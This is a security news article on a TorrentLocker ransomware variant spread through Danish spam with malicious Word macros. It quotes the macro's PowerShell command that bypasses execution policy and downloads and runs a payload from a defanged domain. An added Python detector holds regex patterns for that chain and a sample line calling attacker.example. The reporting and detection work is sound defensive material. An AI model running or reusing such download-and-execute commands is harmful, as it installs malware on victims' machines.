
New TorrentLocker Variant Spreads Through Aggressive Spam Campaigns

Posted: March 2, 2017

Researchers from Heimdal Security report on a version of the notorious ransomware TorrentLocker that is currently spreading through email attachments. Two large spam campaigns carrying the TorrentLocker variant have been detected in the past few days, and they all target users in Denmark.

This time around, the malware campaigns are extremely aggressive, so experts warn users to be watchful about what e-mails they receive. The best tip is never to open an attachment in an e-mail coming from an untrusted source unless you explicitly expect the message and are sure about the safety of its content. What adds to the potential danger of the new malware variant is that it still has very low detection rates. A scan through VirusTotal reveals that only 3 out of 55 tested programs are capable of catching the TorrentLocker Ransomware, yet experts suspect the actual detection levels are even lower. Catching TorrentLocker more effectively is unlikely any time soon, as similar spam campaigns are still showing low detection rates even days after they have been discovered.

TorrentLocker Ransomware Gets A New Distribution Method

This time, the new TorrentLocker is distributed through Microsoft Word documents in which the attackers have embedded malicious macros. Using social engineering techniques, the hackers trick users into downloading the infected files, which later deploy the ransomware on their computer. The researchers found that PowerShell code resembling the following is executed when the victim enables the macros by clicking the "Enable Editing" button: "C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe PowerShell.exe -ExecutIoNPOlICy bypass -nOPrOfILe -wINdowsTyle Hidden (New-Object SYSTEm.nEt.wEBCLIent).DWnlOAdFILE('http://48f4339.js2-order[.]Pl/file/set.rte','C:\Users\[%userprofile%]\AppData\Roaming.EXE'); Start-process 'C:\Users\[%userprofile%]\AppData\Roaming.exe'". The PowerShell code then downloads the TorrentLocker variant.

The default option in the macro settings allows the user to view the attached file; however, clicking the above-mentioned button is what triggers the activation of the malware, eventually leading to the entire computer being locked up.
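As an added illustration from a defender's perspective (this is not code from the article or from Heimdal Security), the following Python flags process command lines that show the traits of the chain described above: ExecutionPolicy bypass, hidden window, WebClient download into AppData, Start-Process, and the randomised letter casing used to defeat naive string matching. The sample command lines are constructed, with a placeholder domain, and are not the article's own indicator.

```python
import re

# Behavioural indicators of the download-and-execute chain described in the
# article. All matching is case-insensitive because the sample randomises
# letter casing (e.g. "-ExecutIoNPOlICy") to evade simple string matching.
INDICATORS = {
    "executionpolicy_bypass": re.compile(r"-ex\w*\s+bypass", re.I),
    "noprofile":              re.compile(r"-nop\w*", re.I),
    "hidden_window":          re.compile(r"-w\w*\s+hidden", re.I),
    "webclient_download":     re.compile(r"new-object\s+system\.net\.webclient", re.I),
    "download_call":          re.compile(r"\.download(file|string)\s*\(", re.I),
    "appdata_drop":           re.compile(r"appdata\\roaming[^'\"]*\.exe", re.I),
    "start_process":          re.compile(r"start-process", re.I),
}

# A normal token is all-lower, all-upper, or camel/PascalCase with an optional
# leading acronym (HTTPClient). Anything else looks like randomised casing.
NORMAL_CASING = re.compile(r"^[a-z]*[A-Z]*(?:[A-Z][a-z]+)*[A-Z]*$")

def case_randomized_tokens(cmdline: str, min_len: int = 4) -> list:
    """Alphabetic tokens whose casing does not follow any normal convention."""
    tokens = re.findall(r"[A-Za-z]+", cmdline)
    return [t for t in tokens if len(t) >= min_len and not NORMAL_CASING.match(t)]

def analyze(cmdline: str) -> dict:
    """Score one process command line (e.g. from Sysmon event 1 or 4688 logs)."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmdline)]
    randomized = case_randomized_tokens(cmdline)
    score = len(hits) + (1 if randomized else 0)   # casing obfuscation counts once
    return {"hits": hits, "randomized_tokens": randomized, "score": score,
            "verdict": "suspicious" if score >= 3 else "benign"}

# Constructed sample mirroring the article's chain (placeholder domain, not the
# real indicator) and a benign administrative command line for comparison.
SAMPLE_MALICIOUS = (
    r"C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -ExecutIoNPOlICy bypass "
    r"-nOPrOfILe -wINdowsTyle Hidden (New-Object SYSTEm.nEt.wEBCLIent).DOwnLOAdFILE("
    r"'http://attacker.example/file/set.rte','C:\Users\victim\AppData\Roaming.EXE'); "
    r"Start-process 'C:\Users\victim\AppData\Roaming.EXE'"
)
SAMPLE_BENIGN = (
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Command Get-Process"
)

if __name__ == "__main__":
    for line in (SAMPLE_MALICIOUS, SAMPLE_BENIGN):
        print(analyze(line))
```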

Furthermore, the new TorrentLocker has some new features which raise its potential to cause severe damage to infected machines. The new malware version not only locks files on the victim's computer but is also capable of stealing usernames and passwords from the infected machine. Another new capability of the threat is spreading itself to other computers through shared files and documents.

While older versions of TorrentLocker can be removed without the victim paying the ransom, researchers doubt whether that holds for the new variant as well. A decrypting tool is available; however, it has not been tested on this new variant, and since the outcome is unknown, victims of the new TorrentLocker should never try to remove it on their own. Therefore, the best way to protect your data is prevention and caution in dealing with your e-mail accounts.
